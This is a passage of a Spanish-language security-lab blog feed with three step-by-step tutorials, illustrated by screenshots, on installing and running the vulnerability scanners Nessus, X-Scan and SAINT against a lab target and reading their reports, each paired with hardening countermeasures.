<p style="text-align: justify;">Ingresamos a la <a href="http://www.nessus.org/nessus/" target="_blank">Web oficial del proyecto Nessus</a>, para descargar la herramienta</p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/4114/nessus1xt1.jpg"><img src="http://img204.imageshack.us/img204/4114/nessus1xt1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos la descarga con base en nuestro sistema operativo. Para este caso lo haremos desde Windows.</p>
<p style="text-align: justify;"><a href="http://img440.imageshack.us/img440/2562/nessus2hz5.jpg"><img src="http://img440.imageshack.us/img440/2562/nessus2hz5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aceptamos los término de licencia</p>
<p style="text-align: justify;"><a href="http://img181.imageshack.us/img181/4948/nessus3cz1.jpg"><img src="http://img181.imageshack.us/img181/4948/nessus3cz1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Allí es recomendable completar el formulario de registro, este permitirá que recibamos actualizaciones en noticias y cambios de la herramienta</p>
<p style="text-align: justify;"><a href="http://img247.imageshack.us/img247/985/nessus4zk9.jpg"><img src="http://img247.imageshack.us/img247/985/nessus4zk9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Finalmente hacemos clic para la descarga directa</p>
<p style="text-align: justify;"><a href="http://img167.imageshack.us/img167/8749/nessus52hd0.jpg"><img src="http://img167.imageshack.us/img167/8749/nessus52hd0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Descargando</p>
<p style="text-align: justify;"><a href="http://img212.imageshack.us/img212/2014/nessus6cj5.jpg"><img src="http://img212.imageshack.us/img212/2014/nessus6cj5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Este será el archivo instalador de la herramienta. Para este caso la versión de Nessus 3.2.1</p>
<p style="text-align: justify;"><a href="http://img208.imageshack.us/img208/3621/nessus7nd3.jpg"><img src="http://img208.imageshack.us/img208/3621/nessus7nd3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Damos doble clic para comenzar con el proceso de instalación</p>
<p style="text-align: justify;"><a href="http://img410.imageshack.us/img410/6168/nessus8gn6.jpg"><img src="http://img410.imageshack.us/img410/6168/nessus8gn6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aceptamos los términos de licencia</p>
<p style="text-align: justify;"><a href="http://img364.imageshack.us/img364/2016/nessus9gv4.jpg"><img src="http://img364.imageshack.us/img364/2016/nessus9gv4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos los componentes a instalar, para este caso el servidor y cliente de nessus</p>
<p style="text-align: justify;"><a href="http://img122.imageshack.us/img122/605/nessus10en2.jpg"><img src="http://img122.imageshack.us/img122/605/nessus10en2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Instalación en ejecución</p>
<p style="text-align: justify;"><a href="http://img142.imageshack.us/img142/2888/nessus11we6.jpg"><img src="http://img142.imageshack.us/img142/2888/nessus11we6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">En este paso seleccionamos el sistema de registro de la herramienta. En nuestro obtamos por: No.</p>
<p style="text-align: justify;"><a href="http://img183.imageshack.us/img183/8798/nessus12rt4.jpg"><img src="http://img183.imageshack.us/img183/8798/nessus12rt4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Actualización de los plugins de nessus</p>
<p style="text-align: justify;"><a href="http://img403.imageshack.us/img403/2520/nessus13iy8.jpg"><img src="http://img403.imageshack.us/img403/2520/nessus13iy8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Finalización de la instalación</p>
<p style="text-align: justify;"><a href="http://img136.imageshack.us/img136/2128/nessus14cn9.jpg"><img src="http://img136.imageshack.us/img136/2128/nessus14cn9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Luego de haber terminado el proceso de instalación, tendremos dos nuevos acceso directos. El cliente Nessus y el configurador del Nessus server.</p>
<p style="text-align: justify;"><a href="http://img136.imageshack.us/img136/7431/nessus15xu6.jpg"><img src="http://img136.imageshack.us/img136/7431/nessus15xu6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Veamos el configurador de Nessus server. Para este caso dejamos las opciones por defecto, pues nuestro server está ubicado en nuestra propia máquina. En caso contrario deberíamos configurarlo con base a los datos del otro server.</p>
<p style="text-align: justify;"><a href="http://img144.imageshack.us/img144/7311/nessus16vx9.jpg"><img src="http://img144.imageshack.us/img144/7311/nessus16vx9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora ejecutemos el cliente Nessus. Para ello hacemos clic en Connect y seleccionamos nuestro servidor (localhost). Luego clic en conectar</p>
<p style="text-align: justify;"><a href="http://img145.imageshack.us/img145/9720/nessus17ba1.jpg"><img src="http://img145.imageshack.us/img145/9720/nessus17ba1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Mensaje recibido en la primera conexión de nessus, hacemos clic en si.</p>
<p style="text-align: justify;"><a href="http://img179.imageshack.us/img179/9739/nessus18vn6.jpg"><img src="http://img179.imageshack.us/img179/9739/nessus18vn6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora configuramos nuestro sistema objetivo. Para este caso, será objetivo una sola máquina, allí escribimos la dirección IP del sistema y finalmente clic en guardar.</p>
<p style="text-align: justify;"><a href="http://img166.imageshack.us/img166/6731/nessus19kv6.jpg"><img src="http://img166.imageshack.us/img166/6731/nessus19kv6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos el sistema recién escrito, las políticas a usar y finalmente en escanear ahora</p>
<p style="text-align: justify;"><a href="http://img403.imageshack.us/img403/8809/nessus20cr2.jpg"><img src="http://img403.imageshack.us/img403/8809/nessus20cr2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Escaneo en ejecución</p>
<p style="text-align: justify;"><a href="http://img120.imageshack.us/img120/880/nessus21hh7.jpg"><img src="http://img120.imageshack.us/img120/880/nessus21hh7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Escaneo finalizado</p>
<p style="text-align: justify;"><a href="http://img136.imageshack.us/img136/3471/nessus22wo2.jpg"><img src="http://img136.imageshack.us/img136/3471/nessus22wo2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Vamos a generar el reporte del escaneo. Para ello damos clic en Export</p>
<p style="text-align: justify;"><a href="http://img519.imageshack.us/img519/439/nessus23yc8.jpg"><img src="http://img519.imageshack.us/img519/439/nessus23yc8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos la ruta donde vamos a guardar el reporte, el formato de este, será en html</p>
<p style="text-align: justify;"><a href="http://img403.imageshack.us/img403/8388/nessus24hf0.jpg"><img src="http://img403.imageshack.us/img403/8388/nessus24hf0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ubicamos el archivo html del reporte y procedemos a ejecutar</p>
<p style="text-align: justify;"><a href="http://img211.imageshack.us/img211/8276/nessus25md0.jpg"><img src="http://img211.imageshack.us/img211/8276/nessus25md0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Reporte generado del escaneo. En él podemos observar la hora de realización, el número de vulnerabilidades, información del sistema objetivo</p>
<p style="text-align: justify;"><a href="http://img257.imageshack.us/img257/5748/nessus26by6.jpg"><img src="http://img257.imageshack.us/img257/5748/nessus26by6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img145.imageshack.us/img145/8527/nessus27oa2.jpg"><img src="http://img145.imageshack.us/img145/8527/nessus27oa2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Descripción detallada de cada una de las vulnerabilidades encontradas. Por ello es el mejor escaner de vulnerabilidades del mercado</p>
<p style="text-align: justify;"><a href="http://img120.imageshack.us/img120/9399/nessus28zr0.jpg"><img src="http://img120.imageshack.us/img120/9399/nessus28zr0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Además podemos guardar el registro del escaneo</p>
<p style="text-align: justify;"><a href="http://img501.imageshack.us/img501/5243/nessus29yv4.jpg"><img src="http://img501.imageshack.us/img501/5243/nessus29yv4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Como vemos, nessus es una herramienta muy completa para el escaneo de vulnerabilidades. En el portal de la comunidad ya había publicado <a href="http://www.dragonjar.org/nessus-client-30-disponible-mas-videos-y-tutoriales-de-uso-y-configuracion.xhtml" target="_blank">contenido de entrenamiento y profundización en el uso de la herramienta</a>, así que material hay, solo es cuestión de dedicarle tiempo y energías a la investigación.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de Nessus<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.<br />
Visualización de los videos de entrenamiento</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong> Escaneo de vulnerabilidades IV</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades II</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-ii</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-ii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:48:35 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=59</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Recordemos antes la definición de escaneo de vulnerabilidades:</p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><span id="more-59"></span><strong>Práctica 52 &#8211; Escaneo de vulnerabilidades con X-Scan<br />
Herramienta: </strong><a href="http://www.seguridad0.biz/programas/X-Scan-v3.3-es.rar" target="_blank">X-Scan</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong><a href="http://www.seguridad0.biz/programas/X-Scan-v3.3-es.rar" target="_blank">X-Scan</a> es el primer analizador de vulnerabilidades totalmente gratuito y en español, para ordenadores con sistemas Windows. Una vez se ejecuta, no sólo localiza los fallos de un ordenador, sino que además genera un informe completísimo, enumerando bugs, en qué consisten, y ofreciendo enlaces a distintos sitios web para descargar el parche que soluciona cada problema localizado.</p>
<p style="text-align: justify;">X-Scan puede analizar un PC o una red completa, lo que lo convierte en ideal para administradores de redes. El programa ha sido desarrollado por Xfocus, un grupo de hackers chinos dedicados al descubrimiento de vulnerabilidades en sistemas. Las primeras versiones en español fueron traducidas, adaptadas y ampliadas por nuestro equipo y continuamos con ello.</p>
<p style="text-align: justify;">Lo curioso de la versión 3.3 de X-Scan es que es totalmente compatible con otro escáner de vulnerabilidades: Nessus, el más conocido entra la comunidad de usuarios de Linux. Este escáner open source cuenta con añadidos, lo que se entiende como plugins en el arbot informático. Estos plugins de ataque descubren agujeros de seguridad. Cada día, los participantes de Nessus programan nuevos plugins con los fallos anunciados en la prensa sobre tal o cual programa.</p>
<p style="text-align: justify;">X-Scan es el primer escáner de vulnerabilidades para Windows que incorpora la base de datos de plugins de Nessus al completo. Es más, como si se tratara de un antivirus, X-Scan dispone de un botón de actualización que, al pulsarse, conecta con la base de datos de Xfocus y se actualiza por completo con las últimas vulnerabilidades descubiertas.</p>
<p style="text-align: justify;">Esto convierte a X-Scan en el primer y único escáner para Windows que siempre está al día de todos los fallos descubiertos, generando auténticos informes que ponen de relieve si el ordenador analizado está cubierto ante los últimos bugs publicados.</p>
<p style="text-align: justify;">X-Scan, además, no precisa de instalación en Windows, lo que evita introducir ficheros innecesarios en el sistema operativo, sobrecargándolo más. Basta con hacer un doble clic y el programa comienza a funcionar a los pocos segundos.</p>
<p style="text-align: justify;">X-Scan es recomendado en la asignatura de seguridad informática de la carrera de Ingeniería de Sistemas Informáticos en las principales universidades españolas.<strong><br />
</strong><strong>Procedimiento:</strong> Descargar, configurar y ejecutar la herramienta definiendo el/los sistemas objetivos.</p>
<p style="text-align: justify;">Para acceder a la herramienta solo basta con descomprimir el archivo descargado y ejecutar el archivo xscan_gui.exe. Veamos:</p>
<p style="text-align: justify;"><a href="http://img140.imageshack.us/img140/4105/xscan1ie9.jpg"><img src="http://img140.imageshack.us/img140/4105/xscan1ie9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Pantalla de incio de la herramienta X-Scan</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/1852/xscan2zn1.jpg"><img src="http://img219.imageshack.us/img219/1852/xscan2zn1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Como primera tarea debemos actualizar la herramienta, ella buscará nuevos cambios en la base de datos de vulnerabilidades.</p>
<p style="text-align: justify;"><a href="http://img134.imageshack.us/img134/2638/xscan3by2.jpg"><img src="http://img134.imageshack.us/img134/2638/xscan3by2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img231.imageshack.us/img231/2236/xscan4qf4.jpg"><img src="http://img231.imageshack.us/img231/2236/xscan4qf4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora debemos configurar la herramienta para determinarle nuestro sistema objetivo</p>
<p style="text-align: justify;"><a href="http://img174.imageshack.us/img174/2118/xscan5ac0.jpg"><img src="http://img174.imageshack.us/img174/2118/xscan5ac0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img176.imageshack.us/img176/6599/xscan6iq8.jpg"><img src="http://img176.imageshack.us/img176/6599/xscan6iq8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para comenzar el escaneo de vulnerabilidades solo basta con hacer clic en el botón</p>
<p style="text-align: justify;"><a href="http://img231.imageshack.us/img231/988/xscan7fp2.jpg"><img src="http://img231.imageshack.us/img231/988/xscan7fp2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Escaneo en ejecución</p>
<p style="text-align: justify;"><a href="http://img395.imageshack.us/img395/5567/xscan8jr2.jpg"><img src="http://img395.imageshack.us/img395/5567/xscan8jr2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Informe en html  de los resultados generados por la herramienta X-Scan</p>
<p style="text-align: justify;"><a href="http://img237.imageshack.us/img237/4550/xscan9js1.jpg"><img src="http://img237.imageshack.us/img237/4550/xscan9js1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Descripción de algunas vulnerabilidades encontradas</p>
<p style="text-align: justify;"><a href="http://img164.imageshack.us/img164/7377/xscan10fp3.jpg"><img src="http://img164.imageshack.us/img164/7377/xscan10fp3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img175.imageshack.us/img175/5989/xscan11bh3.jpg"><img src="http://img175.imageshack.us/img175/5989/xscan11bh3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de X-Scan<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;">Próxima sesión: Escaneo de vulnerabilidades III</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-ii/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades I</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:47:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=57</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Como en todo inicio de un nuevo tema de laboratorio, debemos comenzar por definir el concepto.<br />
Para este caso veamos la definición para el escaneo de vulnerabilidades (Vulnerability Scanner).</p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.</p>
<p style="text-align: justify;">Las vulnerabilidades son el resultado de bugs o de fallos en el diseño del sistema. Aunque, en un sentido más amplio, también pueden ser el resultado de las propias limitaciones tecnológicas, porque, en principio, no existe sistema 100% seguro. Por lo tanto existen vulnerabilidades teóricas y vulnerabilidades reales.</p>
<p style="text-align: justify;">Las vulnerabilidades en las aplicaciones suelen corregirse con parches, hotfixs o con cambios de versión. En tanto algunas otras requieren un cambio físico en un sistema informático.</p>
<p style="text-align: justify;"><span id="more-57"></span>Las vulnerabilidades se descubren muy seguido en grandes sistemas, y el hecho de que se publiquen rápidamente por todo internet (mucho antes de que exista una solución al problema), es motivo de debate. Mientra más conocida se haga una vulnerabilidad, más probabilidades de que existan instrusos informáticos que quieran aprovecharse de ellas.</p>
<p>Algunas vulnerabilidades típicas suelen ser:</p>
<ul>
<li>Desbordes de pila y otros buffers.</li>
<li>Symlink races.</li>
<li>Errores en la validación de entradas como: inyección SQL, bug en el formato de cadenas, etc.</li>
<li>Secuesto de sesiones.</li>
<li>Ejecución de código remoto.</li>
<li>XSS.”</li>
</ul>
<p><a href="http://www.alegsa.com.ar/Dic/vulnerabilidad.php" target="_blank"><em>Fuente</em></a></p>
<p style="text-align: justify;">Por lo tanto, el Escaneo de vulnerabilidades se refiere a la automatización por medio de software especializado para la identificación de dichas fallas (bugs).</p>
<p style="text-align: justify;"><strong>Práctica 51 &#8211; Escaneo de vulnerabilidades con SAINT<br />
Herramienta: </strong><a href="http://download.saintcorporation.com/downloads/freetrial/saint-install-6.7.9.gz" target="_blank">SAINT</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong><a href="http://download.saintcorporation.com/downloads/freetrial/saint-install-6.7.9.gz" target="_blank">SAINT</a> (Security Administrator´s Integrated Network Tool) es una herramienta de evaluación de seguridad basada en <a href="http://www.porcupine.org/satan/" target="_blank">SATAN</a>. Entre sus caracteristicas se incluyen la posibilidad de escanear objetivos protegidos mediante Firewalls, actualización de vulnerabilidades y riesgos de seguridad reportadas desde <a href="http://www.cert.org/netsa/" target="_blank">CERT</a> (Computer Emergency Response Team) y los boletines de la <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">CIAC</a>. Jerarquización en cuatro niveles de severidad de vulnerabilidades (rojo= Problemas críticos, amarillo= áreas de preocupación, café = problemas potenciales y verde = servicios). Todo esto es posible llevarlo a cabo desde una interface web que implementa la herramienta. La herramienta SAINT solo se encuentra disponible para sistemas tipo *nix (Linux)<strong><br />
</strong><strong>Procedimiento:</strong> Descargar, configurar, instalar y ejecutar la herramienta definiendo el/los sistemas objetivos.</p>
<p style="text-align: justify;">Para acceder a la herramienta se hace necesario llevar a cabo un registro en la página web del producto, en ella se nos pedirán datos básicos, sumados a una dirección electrónica donde recibiremos la llave de activación del producto después de haber especificado las IP’s objetivos del análisis. (La versión utilizada para este laboratorio es una versión trial por 15 días, sin la opción de explotación de fallas, además requiere tener previo conocimiento de las 2 IPs objetivo)</p>
<p><a href="http://img165.imageshack.us/img165/5940/saint2el3.jpg"><img src="http://img165.imageshack.us/img165/5940/saint2el3.th.jpg" alt="" /></a></p>
<p>Descargamos la herramienta y el archivo saint.key</p>
<p><a href="http://img53.imageshack.us/img53/1716/saint11mf2.jpg"><img src="http://img53.imageshack.us/img53/1716/saint11mf2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">En la misma página de descarga es posible encontrar unas pequeñas instrucciones de instalación y ejecución de la herramienta</p>
<p><a href="http://img204.imageshack.us/img204/4484/saint31cv7.jpg"><img src="http://img204.imageshack.us/img204/4484/saint31cv7.th.jpg" alt="" /></a></p>
<p>Procedemos entonces a darle los permisos necesarios de ejecución al archivo</p>
<p><a href="http://img207.imageshack.us/img207/1205/saint4gx6.jpg"><img src="http://img207.imageshack.us/img207/1205/saint4gx6.th.jpg" alt="" /></a></p>
<p>Ejecutamos el comando de instalación</p>
<p><a href="http://img204.imageshack.us/img204/1916/saint5qe7.jpg"><img src="http://img204.imageshack.us/img204/1916/saint5qe7.th.jpg" alt="" /></a></p>
<p>Aceptamos los términos de licencia</p>
<p><a href="http://img204.imageshack.us/img204/674/saint6ee4.jpg"><img src="http://img204.imageshack.us/img204/674/saint6ee4.th.jpg" alt="" /></a></p>
<p>Continúa el proceso de instalación</p>
<p><a href="http://img156.imageshack.us/img156/8818/saint7pl4.jpg"><img src="http://img156.imageshack.us/img156/8818/saint7pl4.th.jpg" alt="" /></a></p>
<p>Nos pide confirmar algunas opciones</p>
<p><a href="http://img146.imageshack.us/img146/1473/saint8wk5.jpg"><img src="http://img146.imageshack.us/img146/1473/saint8wk5.th.jpg" alt="" /></a></p>
<p>Finaliza la instalación de SAINT</p>
<p><a href="http://img242.imageshack.us/img242/6835/saint9yp9.jpg"><img src="http://img242.imageshack.us/img242/6835/saint9yp9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Como vimos en el proceso de instalación, nos pedía autorizar la creación de un acceso directo en el escritorio. Este ya ha sido creado</p>
<p><a href="http://img204.imageshack.us/img204/1711/saint10fq0.jpg"><img src="http://img204.imageshack.us/img204/1711/saint10fq0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para este laboratorio, ejecutaré SAINT desde la línea de comandos, para ello me ubicaré en la carpeta contenedora del aplicativo. “<strong>./saint</strong> “</p>
<p><a href="http://img53.imageshack.us/img53/2871/saint11pi6.jpg"><img src="http://img53.imageshack.us/img53/2871/saint11pi6.th.jpg" alt="" /></a></p>
<p>Inicialización de la herramienta</p>
<p><a href="http://img341.imageshack.us/img341/5723/saint121qv4.jpg"><img src="http://img341.imageshack.us/img341/5723/saint121qv4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Primera ejecución del SAINT, es en esta pantalla donde llevaremos a cabo el proceso de activación de la herramienta</p>
<p><a href="http://img412.imageshack.us/img412/8427/saint13ie3.jpg"><img src="http://img412.imageshack.us/img412/8427/saint13ie3.th.jpg" alt="" /></a></p>
<p>Seleccionamos la acción a realizar, para este caso “Configure SAINT Key”</p>
<p><a href="http://img149.imageshack.us/img149/5927/saint14km2.jpg"><img src="http://img149.imageshack.us/img149/5927/saint14km2.th.jpg" alt="" /></a></p>
<p>Espacio destinado para incluir la llave de registro</p>
<p><a href="http://img248.imageshack.us/img248/5075/saint15ux2.jpg"><img src="http://img248.imageshack.us/img248/5075/saint15ux2.th.jpg" alt="" /></a></p>
<p>Copiamos y pegamos el contenido del archivo saint.key</p>
<p><a href="http://img53.imageshack.us/img53/3051/saint16oq2.jpg"><img src="http://img53.imageshack.us/img53/3051/saint16oq2.th.jpg" alt="" /></a></p>
<p>Obtendremos la siguiente pantalla de aviso de confidencialidad</p>
<p><a href="http://img207.imageshack.us/img207/7281/saint17rh4.jpg"><img src="http://img207.imageshack.us/img207/7281/saint17rh4.th.jpg" alt="" /></a></p>
<p>Para continuar solo basta con actualizar la página</p>
<p><a href="http://img185.imageshack.us/img185/4950/saint18uh7.jpg"><img src="http://img185.imageshack.us/img185/4950/saint18uh7.th.jpg" alt="" /></a></p>
<p>Aviso de que la llave ha sido registrada con éxito</p>
<p><a href="http://img297.imageshack.us/img297/616/saint19ei2.jpg"><img src="http://img297.imageshack.us/img297/616/saint19ei2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Después de llevar a cabo el proceso de registro, veamos como realizar un escaneo con SAINT a un sistema objetivo ya definido</p>
<p><a href="http://img60.imageshack.us/img60/2300/saint20oc0.jpg"><img src="http://img60.imageshack.us/img60/2300/saint20oc0.th.jpg" alt="" /></a></p>
<p>Activamos una de las opciones más importantes de SAINT; Soporte para Firewalls</p>
<p><a href="http://img502.imageshack.us/img502/6604/saint21qe3.jpg"><img src="http://img502.imageshack.us/img502/6604/saint21qe3.th.jpg" alt="" /></a></p>
<p>Ejecutemos el escano haciendo clic en el botón Escanear Ahora</p>
<p><a href="http://img529.imageshack.us/img529/8632/saint22jh5.jpg"><img src="http://img529.imageshack.us/img529/8632/saint22jh5.th.jpg" alt="" /></a></p>
<p>Escaneo en ejecución</p>
<p><a href="http://img502.imageshack.us/img502/6730/saint23ak9.jpg"><img src="http://img502.imageshack.us/img502/6730/saint23ak9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Después de pocos minutos (dependiendo del tipo de escaneo que se lleve a cabo) obtenemos la posibilidad de generar el reporte y análisis del mismo</p>
<p><a href="http://img412.imageshack.us/img412/9778/saint24rn6.jpg"><img src="http://img412.imageshack.us/img412/9778/saint24rn6.th.jpg" alt="" /></a></p>
<p>Generamos el reporte</p>
<p><a href="http://img242.imageshack.us/img242/1575/saint25nq2.jpg"><img src="http://img242.imageshack.us/img242/1575/saint25nq2.th.jpg" alt="" /></a></p>
<p>En reportes por defecto, seleccionaremos “Escaneo completo”</p>
<p><a href="http://img207.imageshack.us/img207/7421/saint26ky3.jpg"><img src="http://img207.imageshack.us/img207/7421/saint26ky3.th.jpg" alt="" /></a></p>
<p>Luego hacemos clic en continuar</p>
<p><a href="http://img149.imageshack.us/img149/6679/saint27hx6.jpg"><img src="http://img149.imageshack.us/img149/6679/saint27hx6.th.jpg" alt="" /></a></p>
<p>Vista del reporte</p>
<p><a href="http://img53.imageshack.us/img53/5821/saint28si5.jpg"><img src="http://img53.imageshack.us/img53/5821/saint28si5.th.jpg" alt="" /></a></p>
<p>Gráfica de barras del reporte según los tipos de riesgos encontrados</p>
<ul>
<li>Problemas críticos: 1</li>
<li>Áreas de preocupación: 3</li>
<li>Problemas potenciales: 5</li>
<li>Servicios activos: 10</li>
</ul>
<p><a href="http://img213.imageshack.us/img213/17/saint29rh9.jpg"><img src="http://img213.imageshack.us/img213/17/saint29rh9.th.jpg" alt="" /></a></p>
<p>Descripción de vulnerabilidades según su tipología</p>
<ul>
<li>Web</li>
<li>Mail</li>
<li>File Transfer</li>
<li>Login/Shell</li>
<li>Print Services</li>
<li>RPC</li>
<li>DNS</li>
<li>Databases</li>
<li>Networking/SNMP</li>
<li>Windows OS</li>
<li>Passwords</li>
<li>Other</li>
</ul>
<p><a href="http://img341.imageshack.us/img341/7109/saint30yc9.jpg"><img src="http://img341.imageshack.us/img341/7109/saint30yc9.th.jpg" alt="" /></a></p>
<p>Gráfica de barras según los resultados obtenidos por tipología de la vulnerabilidad</p>
<ul>
<li>Web: 4</li>
<li>Login/Shell: 1</li>
<li>Print Services: 2</li>
<li>Other: 2</li>
</ul>
<p><a href="http://img297.imageshack.us/img297/495/saint31mi2.jpg"><img src="http://img297.imageshack.us/img297/495/saint31mi2.th.jpg" alt="" /></a></p>
<p>Profundización en la información sobre las vulnerabilidades encontradas</p>
<p>ej. Versión 4.4.4 de PHP vulnerable. Información en <a href="http://cve.mitre.org/" target="_blank">CVE</a> (Common Vulnerabilities and Exposures)</p>
<p><a href="http://img149.imageshack.us/img149/2579/saint32ed3.jpg"><img src="http://img149.imageshack.us/img149/2579/saint32ed3.th.jpg" alt="" /></a></p>
<p><a href="http://img53.imageshack.us/img53/4563/saint33aj3.jpg"><img src="http://img53.imageshack.us/img53/4563/saint33aj3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Información sobre los servicios en ejecución en el sistema objetivo</p>
<p><a href="http://img55.imageshack.us/img55/6553/saint34qs1.jpg"><img src="http://img55.imageshack.us/img55/6553/saint34qs1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera, esta “corta” definición e introducción sobre el uso de la herramienta SAINT para realizar escaneos de vulnerabilidades. Cabe aclarar que este es solo un pequeño paso para llevar a cabo un test de penetración, pues queda el largo camino del análisis de los resultados obtenidos, en el cual se debe verificar la veracidad de los resultados, vulnerabilidades no encontradas, y un largo etc.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de SAINT<br />
